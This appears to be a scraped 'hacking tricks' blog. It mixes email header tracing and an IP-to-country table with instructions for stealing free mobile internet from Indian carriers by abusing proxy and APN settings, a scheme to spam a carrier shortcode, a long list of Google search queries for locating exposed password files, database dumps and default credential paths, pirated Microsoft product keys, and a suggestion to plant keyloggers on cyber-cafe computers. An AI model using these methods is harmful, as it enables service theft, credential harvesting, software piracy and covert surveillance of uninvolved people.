Form is useless in tracing an e-mail. It consists of the email of the sender but this can be obviously be a fake. One can use any fake-mailer to fake the sender's name.

Content-Type:
This line tells the receiving e-mail client exactly what MIME type or types are included in the e-mail message. If the Content–Type is text/plain; charset="us-ascii" just tells us that the message contains a regular text message that uses English characters. ASCII is the American Standard Code for Information Interchange and is the system used to convert numbers to English characters.

Return-Path:
It is the address to which your return e-mail will be sent. Different e-mail programs use other variations of Return-Path:. These might include Return-Errors-To: or Reply-To etc.

Received:
This field is the key to find out the source of any e-mail. Like a regular letter, e-mails gets postmarked with information that tells where it has been. However, unlike a regular letter, an e-mail might get "postmarked" any number of times as it makes its way from its source through a number of mail transfer agents (MTAs). The MTAs are responsible for properly routing messages to their destination.

Let me strip-off the above email header to make the understanding easy. The header is splitted and the two received headers are given below.
Received Header 1: 204.127.198.35 - Tue, 25 Nov 2003 19:56:18 -0800
from rwcrmhc11.comcast.net ([204.127.198.35])
by mc7-f12.hotmail.com
with Microsoft SMTPSVC(5.0.2195.6713)

Received Header 2: 68.37.24.150 - Wed, 26 Nov 2003 03:44:57 +0000
from pavilion (pcp03530790pcs.mnhwkn01.nj.comcast.net[68.37.24.150])
by comcast.net (rwcrmhc11)
with SMTP
id <20031126034457013001nk6pe>

The MTAs are "stamped" on the e-mail's header so that the most recent MTA is listed on the top of the header and the first MTA through which the e-mail has passed in listed on the bottom of the header. In the above sample e-mail header, e-mail first passed through 68.37.24.150 (pcp03530790pcs.mnhwkn01.nj.comcast.net), and at last made its way through 204.127.198.35 (rwcrmhc11.comcast.net).

In the Received Header 2, the one marked with red colour "pavilion" is either the domain name of the server from which the email has originated or the name of the computer from which the email has been sent. By doing a DNS query for "pavilion", it is confirmed that it is not a know host name hence, must be the name of the computer from which the mail has originated. "68.37.24.150" is the IP address from which the mail might have originated or it is the IP address of the ISP (Internet Service Provider) to which the user was logged on while sending the mail.

Note: Correct me if I am wrong, most of the time "HELO" is prefixed to the system name from which the mail has originated, but its accuracy is not reliable.

Trace who owns the IP address
Every computers hooked on to internet is assigned with an IP address. Individual users possess a dynamic IP address when they logged on to any ISP to access internet. These IP addresses are assigned by the ISP itself. Organization usually possess static/public IP address which is stored in a database of registries.

There are three major registries covering different parts of the world. They are
www.arin.net => American Registry of Internet Numbers (ARIN) : It assigns IP addresses for the Americas and for sub Saharan Africa.
www.apnic.net => Asia Pacific Network Information Centre (APNIC) : It covers Asia
www.ripe.net => Réseaux IP Européens (RIPE NCC) : It covers Europe

Thus, to find out which organization owns a particular IP address, you can make a "WHOIS" query in the database at any of these registries. You do this by typing the IP address into the "WHOIS" box that appears on each of these websites.

"Received Header" will have the IP address of the ISP in case the users has dialed up to the ISP while sending the email. But if the user has send the email from within the corporate then the corporate public/static IP address is logged.

By giving a "WHOIS" query for 68.37.24.150 at www.arin.net, the following result has been displayed:

Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NJ-NORTH-14 (NET-68-37-16-0-1)
68.37.16.0 - 68.37.31.255

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

From above queries it is found that the IP address (68.37.24.150) is owned "Comcast". By making further queries on "Comcast" it is found that it is the name of the ISP located in NJ, US - 08002. The result of further query is given below:

OrgName: Comcast Cable Communications, Inc.
OrgID: CMCS
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
PostalCode:08002
Country: US

NetRange: 68.32.0.0 - 68.63.255.255
CIDR: 68.32.0.0/11
NetName: JUMPSTART-1
NetHandle: NET-68-32-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: DNS01.JDC01.PA.COMCAST.NET
NameServer: DNS02.JDC01.PA.COMCAST.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-29
Updated: 2003-11-05

TechHandle: IC161-ARIN
TechName: Comcast Cable Communications Inc
TechPhone: +1-856-317-7200
TechEmail: cips_ip-registration@cable.comcast.com

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail: abuse@comcast.net

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail: cips_ip-registration@cable.comcast.com

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

Now since the IP address found belongs to an ISP, it is clear that the sender has dialed up to this ISP while sending the email. For further enquiry we can then request the ISP to provide us with details of the user who has dialed up to them at that given point of time (Wed, 26 Nov 2003 03:44:57 +0000). If the ISP cooperates, they will check their user and message logs to see who was logged into that particular IP address at that time and date. This will reveals the sender's telephone number from which he/she has dialed to the ISP. Now once we have the telephone number we can easily retrieve the name and address of the sender.

Now the above case is solved but there are also other cases where the IP address found on the email header may be owned by an organisation or a cyber cafe. Below I have discussed how you can trace the sender in both of these cases.

Cases1: THE IP ADDRESS OWNED BY AN ORGANISATION
But in case the IP address found belongs to an organisation then you have to request them to provide information about the user who has send the mail from within the organisation network. They must have user and message logs on their firewall / proxy and can trace each of their computers connected at the given point of time. By supplying the organisation with the e-mail header of the offending e-mail, they can check these logs and hopefully produce information of the user of that machine.

Cases2: THE IP ADDRESS OWNED BY A CYBER-CAFE
In case it is found that the sender has sent the email from a cyber-cafe then it becomes a difficult task to trace him/her. The user may not be a frequent visitor to that cyber-cafe. But let's assume that you receive such mails frequently from that particular cyber-cafe then you can install "key-loggers" in the computers at the cafe. These programs records user's keystrokes, thus creating a record of everything that was typed at a particular terminal. By reviewing the key-logger logs you may be able to trace the sender in this case.

Note: These methods would aid greatly in identifying an e-mail sender, they also would impinge on the rights of others using the computers to conduct their personal business. Such a conflict defines the ongoing struggle between the fight against terrorism over the Internet and the right to privacy, which will continue to evolve in the years ahead.

## Send me information if you know a better way to trace a sender who uses cyber cafe to send email. ##



ENJOY HACKING

POST COMMENTS(ankush)
Labels: 0 comments | | edit post
ANKUSH
Search the IP-COUNTRY TABLE to match a unique record that has the IP number fits between From IP Number and To IP Number.

For example, IP Address "202.186.13.4" is equivalent to IP Number "3401190660". It falls in the following range of IP number in the table because it is between the "From IP number" and the "To IP number".

"3401056256","3401400319","MY","MALAYSIA"

From the IP range, the Country Name is Malaysia and Country Code is MY.

IP-COUNTRY TABLE

From IP Number To IP Number Country Code Country Name
3400892416 3400925183 HK HONG KONG
3400925184 3400933375 TH THAILAND
3400941568 3400949759 AU AUSTRALIA
3400957952 3400966143 AU AUSTRALIA
3400982528 3400990719 HK HONG KONG
3400990720 3400998911 ID INDONESIA
3400998912 3401003007 PH PHILIPPINES
3401007104 3401011199 IN INDIA
3401023488 3401056255 TH THAILAND
3401056256 3401400319 MY MALAYSIA
3401408512 3401416703 HK HONG KONG
3401416704 3401420799 KR KOREA, REPU
3401441280 3401449471 PH PHILIPPINES
3401449472 3401515263 MY MALAYSIA
3401531392 3401539583 IN INDIA
3401547776 3401580543 MY MALAYSIA
3401580544 3402629119 CN CHINA
3402629120 3404464127 JP JAPAN
3405774848 3406434303 AU AUSTRALIA
3406436352 3409969151 AU AUSTRALIA
3409969152 3410755583 TW TAIWAN
3410755584 3410780159 AU AUSTRALIA
3410788352 3410796543 HK HONG KONG
3410796544 3410800639 LK SRI LANKA
3410812928 3410821119 AU AUSTRALIA
3410821120 3410853887 TW TAIWAN
3410853888 3410862079 HK HONG KONG
3410870272 3410874367 IN INDIA
3410878464 3410886655 ID INDONESIA
3410886656 3410887679 TW TAIWAN
3410894848 3410898943 HK HONG KONG
3410903040 3410911231 HK HONG KONG
3410919424 3410927615 IN INDIA
3410944000 3410952191 PH PHILIPPINES
3410952192 3410960383 TW TAIWAN
3410968576 3410984959 NZ NEW ZEALAND
3410984960 3411017727 TW TAIWAN
3411017728 3411018751 HK HONG KONG
3411034112 3411051519 HK HONG KONG
3411058688 3411062783 AU AUSTRALIA
3411066880 3411083775 HK HONG KONG
3411087360 3411091455 CN CHINA
3411091456 3411095551 SG SINGAPORE
3411099648 3411107839 MM MYANMAR
3411116032 3411124223 IN INDIA
3411132416 3411136511 PK PAKISTAN
3411147776 3411149311 HK HONG KONG
3411156992 3411161087 PH PHILIPPINES
3411165184 3411173375 MY MALAYSIA
3411181568 3411189759 JP JAPAN
3411197952 3411202047 BD BANGLADESH
3411213312 3411215359 HK HONG KONG
3411230720 3411247103 HK HONG KONG
3411247104 3411255295 AU AUSTRALIA
3411278848 3411296255 HK HONG KONG
3411312640 3411313151 HK HONG KONG
3411329024 3411337215 PH PHILIPPINES
3411337216 3411341311 AU AUSTRALIA
3411345408 3411411967 HK HONG KONG
3411435520 3411443711 IN INDIA
3411443712 3411460095 HK HONG KONG
3411475456 3411476479 HK HONG KONG
3411476480 3411509247 AU AUSTRALIA
3411509248 3411517439 PH PHILIPPINES
3411525632 3411529727 SG SINGAPORE
3411533824 3411543039 CN CHINA
3411558400 3411566591 AU AUSTRALIA
3411574784 3411582975 IN INDIA
3411591168 3411595263 HK HONG KONG
3411599360 3411607551 AU AUSTRALIA
3411607552 3411608575 CN CHINA
3411623936 3411632127 AU AUSTRALIA
3411640320 3411648511 PK PAKISTAN
3411656704 3411673087 AU AUSTRALIA
3411673088 3411674111 CN CHINA
3411689472 3411701759 IN INDIA
3411722240 3411726335 PH PHILIPPINES
3411730432 3411738623 HK HONG KONG
3411738624 3411739647 CN CHINA
3411755008 3411763199 AU AUSTRALIA
3411771392 3411779583 HK HONG KONG
3411795968 3411804159 AU AUSTRALIA
3411804160 3411805183 CN CHINA
3411820544 3411832831 SG SINGAPORE
3411836928 3411845119 MY MALAYSIA
3411853312 3411857407 IN INDIA
3411861504 3411869695 AU AUSTRALIA
3411869696 3411943423 CN CHINA
3411951616 3411967999 LK SRI LANKA
3411968000 3411984383 AU AUSTRALIA
3411984384 3412000767 IN INDIA
3412000768 3412002815 CN CHINA
3412017152 3412025343 SG SINGAPORE
3412033536 3412066303 TW TAIWAN
3412066304 3412213759 NZ NEW ZEALAND
3412213760 3412221951 AU AUSTRALIA
3412230144 3412246527 HK HONG KONG
3412254720 3412262911 NR NAURU
3412262912 3412273151 NZ NEW ZEALAND
3412279296 3412281343 NZ NEW ZEALAND


ENJOY HACKING (ANKUSH)


POST COMMENTS
ANKUSH
IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.
ANKUSH
here are the steps to perform:-

Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,

Supported devices: all phones with multichannel gprs support

For connection on your mobile phone:-

1) Make two connections like bsnlportal and BSNLPORTAL1

(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)

2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this

3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –

the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”

(step 2)

“Access denied.

Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”

4) close opera and open web and open a site like esato.com

5) if everything is done as said here then esato will load and voila! We have the whole internet!

For connection on pc.

1)create a connection and enter the number to be dialed as *99***1#

2) enter the following string as extra initialization command

3)now dial from pc, the connection will be established

4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .

5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here

settings for profiles

apn: celloneportal
ip: 192.168.51.163
port : 8080

leave other fields blank as they are of the least concern!

the browser settings on pc too go the same as mentioned above!

ENJOY HACKING

POST COMMENTS[ANKUSH]
Labels: 0 comments | | edit post
ANKUSH
Although I use Airtel and a Beetel 220 BX modem as my basis for this write up, the same rules can be applied to others as well. So lets get started. First thing make sure your DSL modem is on. Fire up your browser. Type http://192.168.1.1 as the address with the following Username/Password - Username : admin Password : password Note : These are case sensitive. Make sure all are typed in lowercase. Click on Advanced Setup -> NAT in the page that loads. If you do not see these options try entering http://192.168.1.1/main.html as the address. Some routers/modems deliberately try to prevent users from accessing these options. On the NAT virtual servers page click the add button. Now add the port number that you wish to open up. You can even open up a range of ports using the add button. You should see something similar to the screenshot below.




This technique can be used for any operating system / modem / service provider. It may vary slightly but the essential principle remains the same.


enjoy hacking.

post comments[ankush]
Labels: 0 comments | | edit post
ANKUSH
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
FIRST TRICK[ANKUSH]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal. *********



>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SECOND TRICK[ANKUSH]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


Under DATA COMM
~~~~~~~~~~~~

APN : airtelfun.com

USERNAME : blank

PASSWORD : blank

PASS REQ : OFF

ALLOW CALLS : AUTOMATIC

IPADDRESS :

DNSADDRESS :

DATA COMP : OFF

HEADER COMP : OFF


Under INTERNET PROFILES
~~~~~~~~~~~~~~~~

INTERNET MODE : HTTP or WAP (both worked for me)

USE PROXY : YES

IP ADDRESS : 100.1.200.99

PORT : 8080

USERNAME :

PASSWORD :

No Risk Here, Try it and Enjoy


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
THIRD TRICK[ANKUSH]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)

now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
FOURTH TRICK[ANKUSH]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

For All Airtel Users

Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-

1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.

2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.

3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).

**Note: always make sure that ur access point is airtelfun.com

Apply:-

1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.

2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.

3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.

U can also use it through ur computer..........

someone said dis too

The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get "G" signal on ur cell as bsnl portal (wap.cellone.in) needs "gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)

NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS----
---THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
---THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
---THAT ur handset has some problems (if u say that "G" signal is not present)
----etc,etc!!

U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC'S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS--
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT'S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC'S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))

I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorect but gives u an idea of settings in ur area))
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
6)AFTER THAT, u have 2 only wait until "G" signal is there on ur screen!!

LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my "G" service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!by Ankush.


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
FIFTH TRICK[ANKUSH]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


First open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is "Airtelmms.com" instead of originally "Airtelgprs.com".
ok u've done it just active that setting and access free airtel gprs on ur phone.

enjoy hacking .

post comments[ankush]
Labels: 0 comments | | edit post
ANKUSH

Google is a treasure trove full of important information, especially for the underground world. This Potential fact can also be utilized in the data for the username and password stored on a server.



If the administrator save important data not in the complete system authentifikasi folder, then most likely be reached by the google search engine. If data is successfully steal in by the unauthorized person, then the will be in misuse.

Here, some google search syntax to crawl the password:

1.
"Login: *" "password =*" filetype: xls (searching data command to the system files that are stored in Microsoft Excel)

2.
allinurl: auth_user_file.txt (to find files auth_user_file.txt containing password on server).

3. filetype: xls inurl: "password.xls" (looking for username and password in ms excel format). This command can change with admin.xls)

4.
intitle: login password (get link to the login page with the login words on the title and password words anywhere. If you want to the query index more pages, type allintitle)

5. intitle: "Index of" master.passwd (index the master password page)

6. index of / backup (will search the index backup file on server)

7. intitle: index.of people.lst (will find web pages that contain user list).

8. intitle: index.of passwd.bak ( will search the index backup password files)

9. intitle: "Index of" pwd.db (searching database password files).

10. intitle: "Index of .. etc" passwd (this command will index the password sequence page).

11. index.of passlist.txt (will load the page containing password list in the clear text format).

12. index.of.secret (google will bring on the page contains confidential document). This syntax also changed with government query site: gov to search for government secret files, including password data) or use syntax: index.of.private

13. filetype: xls username password email (will find spreadsheets filese containing a list of username and password).

14. "# PhpMyAdmin MySQL-Dump" filetype: txt (will index the page containing sensitive data administration that build with php)

15. inurl: ipsec.secrets-history-bugs (contains confidential data that have only by the super user). or order with inurl: ipsec.secrets "holds shared secrets"

16. inurl: ipsec.conf-intitle: manpage (useful to find files containing important data for hacking)

17. inurl: "wvdial.conf" intext: "password" (display the dialup connection that contain phone number, username and password)

18. inurl: "user.xls" intext: "password" (showing url that save username and passwords in spread sheet files)

19. filetype: ldb admin (web server will look for the store password in a database that dos not delete by googledork)

20.inurl: search / admin.php (will look for php web page for admin login). If you are lucky, you will find admin configuration page to create a new user.

21.
inurl: password.log filetype:log (this keyword is to search for log files in a specific url)

22. filetype: reg HKEY_CURRENT_USER username (this keyword used to look for reg files (registyry) to the path HCU (Hkey_Current_User))


In fact, there are many more commands that google can crawl in use in the password. One who has the ability google reveals in this case is http://johnny.ihackstuff.com. For that, visit the web to add insight about the google ability.

Here, some of the other syntax google that we need to look for confidential data :

"Http://username: password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"
(this command is to take the user names and passwords for backup files)

filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files (this command is to take the password information)

filetype:ini ws_ftp pwd (searching admin password with ws_ftp.ini file)

intitle: "Index of" pwd.db (searching the encrypted usernames and passwords)

inurl:admin inurl:backup intitle:index.of (searching directories whose names contain the words admin and backup)

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD (WS_FTP configuration files is to take FTP server access passwords)

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-” (there is Microsoft FrontPage passwords)

filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****")searching a SQL code and passwords stored in the database)

intitle:index.of trillian.ini (configuration files for the Trillian IM)

eggdrop filetype:user (user configuration files for the Eggdrop ircbot)

filetype:conf slapd.conf (configuration files for OpenLDAP)

inurl:”wvdial.conf” intext:”password” (configuration files for WV Dial)

ext:ini eudora.ini (configuration files for the Eudora mail client)

filetype: mdb inurl: users.mdb (potentially to take user account information with Microsoft Access files)

intext:”powered by Web Wiz Journal” (websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/)

“Powered by DUclassified” -site:duware.com "Powered by DUclassified"-site: duware.com
“Powered by DUcalendar” -site:duware.com "Powered by DUcalendar"-site: duware.com
“Powered by DUdirectory” -site:duware.com "Powered by DUdirectory"-site: duware.com
“Powered by DUclassmate” -site:duware.com "Powered by DUclassmate"-site: duware.com
“Powered by DUdownload” -site:duware.com "Powered by DUdownload"-site: duware.com
“Powered by DUpaypal” -site:duware.com "Powered by DUpaypal"-site: duware.com
“Powered by DUforum” -site:duware.com "Powered by DUforum"-site: duware.com


intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com(websites that use DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, by default allows us to retrieve passwords file)

To DUclassified, just visit http:///duClassified/ _private / duclassified.mdb
or http:///duClassified/ or http:///duClassified/

intext: "BiTBOARD v2.0" "BiTSHiFTERS Bulletin Board" (Bitboard2 use the website bulletin board, the default settings make it possible to retrieve the passwords files to be obtained with the ways http:///forum/admin/data _ passwd.dat
or http:///forum/forum.php) or http:///forum/forum.php)

Searching for specific documents :

filetype: xls inurl: "email.xls" (potentially to take the information contact)

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs "not for distribution"
(confidential documents containing the confidential clause
buddylist.blt)

AIM contacts list AIM contacts list

intitle:index.of mystuff.xml intitle: index.of mystuff.xml

Trillian IM contacts list Trillian IM contacts list

filetype:ctt “msn” filetype: Note "msn"

MSN contacts list MSN contacts list

filetype:QDF
(QDF database files for the Quicken financial application)

intitle: index.of finances.xls (finances.xls files, potentially to take information on bank accounts, financial Summaries and credit card numbers)

intitle: "Index Of"-inurl: maillog (potentially to retrieve e-mail account)


enjoy hacking[ankush]

ANKUSH
On increasing demand hear is the steps

1. Open the Reliance Netconnect Interface and Click Settings [ Make sure you are connected to internet through reliance netconnect, or else you would need to disconnect when you change the settings ]

2.Now click Network in the left pane, now you might have Hybrid Connection selected in the network type, select the Broadband+ as network type and click apply and now connect to internet.

3.Reason To Change the Network Type - By default Hybrid mode is available in indian cities which includes metro cities in some selected areas, if the signals fall in their strength the connection would still be alive and will switch to the lower speed mode of 1x which gives 144 kbps. It will also result in frequent disconnection.

On the other hand if you switch to broadband+ connection type , it seems to be a stable network type in which you may experience better speed and will not experience frequent disconnections.


enjoy hacking [ankush]



ANKUSH
Tools Hacking By Bebytza_[ankush]BrT
ANKUSH
MS OFFICE 2010 BY ANKUSH (NEW)
x86
774GJ-X3942-9GTKT-FWYJ9-KM77K

x64
4F3B6-JTT3F-VDCD6-G7J4Q-74W3R
2MHJR-V4MR2-V4W2Y-72MQ7-KC6XK



***Microsoft Office Professional Plus 2010:

22HGX-728MX-BBWX9-7BB8X-J96B4



***Visio Premium 2010:

PQCFB-YGXGC-TXB66-DH3VW-GCGYQ



***Project Professional 2010:


CQYRY-3KBR3-JW34C-VGH7M-MQM49


>>>>>>>>>>>>>>>>>>>>>>>>>
MS OFFICE 2007 KEYS BY ANKUSH

JMPQ9-QM9GG-99FX6-8KBRR-6BVD8

KYY93-FW482-G48PG-K9YYB-QBDQ8

DYY34-CPVPT-PDVWM-TG8KJ-2WK38

FTMB3-QQKKH-CDB64-3YDD3-XWRMJ

HV9WD-9RBPG-D6822-KP6W6-9X4MJ

WCRXW-M798H-PMGQ9-TQ4XG-XTPVW

KGFVY-7733B-8WCK9-KTG64-BC7D8


****Microsoft® Office Professional 2007

HCBDR-23TM6-CB8HH-4RQBT-TMCFJ



***OFFICE 2007 PRO

TT3M8-H3469-V89G6-8FWK7-D3Q9Q

VB48G-H6VK9-WJ93D-9R6RM-VP7GT

HCFPT-K86VV-DCKH3-87CCR-FM6HW


***office2007 enterprise BY ANKUSH

H86Q7-F86BG-KBWRQ-YQXQH-HD3Q8

***office2007 60 day trial BY ANKUSH

T3PVR-XX42X-T49DW-WGBG6-9FT73

***OFFICE XP BY ANKUSH

FM9FY-TMF7Q-KCKCT-V9T29-TBBBG

***OFFICE XP CD KEYS BY ANKUSH

BJJ36-X7TH2-9D7M9-P5TG4-XP7DM

fm9fy-tmf7q-kckct-v9t29-tbbbg

***MS Office Professional 2003 Serial BY ANKUSH

GWH28-DGCMP-P6RC4-6J4MT-3HFDY

***Microsoft Office FrontPage 2003, One Note 2003, Visio Note 2003 y Project Professional 2003

by ANKUSH\\

CD-KEY: WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM

ENJOY HACKING[ANKUSH]
***IF U WANT THE SERIAL OF ANY SOFTWARE THEN MAIL ME AT ankuraja@gmail.com


Labels: 10 comments | | edit post
ANKUSH
Vista Genuine Keys by ANKUSH

Windows Vista Business:
6QQW2-XHVBY-3P47M-TQDY2-CDWYY
PVK4K-49YX6-VX4Q4-JQJT6-8Q3JC
FJG7P-8M32X-JQ4P4-BYMHG-JKWJC

Windows Vista Home Premium:
KG843-7KP9F-WY989-X7PV3-DPX2P
2KTJJ-RVD7C-2KM4D-9VDPR-WJ6Q2
H2H8G-DMC9W-XCPYW-BBHQP-RGP47

Windows Vista Ultimate:
TTVGK-T3YYP-HGHF6-B998H-92XRR
7RTRH-FQGFR-3VYBC-H6DCH-C6HJW
RB66W-M3HPP-999B8-MXGWY-XFJF8
>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vista|Ultimate|Acer|3YDB8-YY3P4-G7FCW-GJMPG-VK48C

Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4F

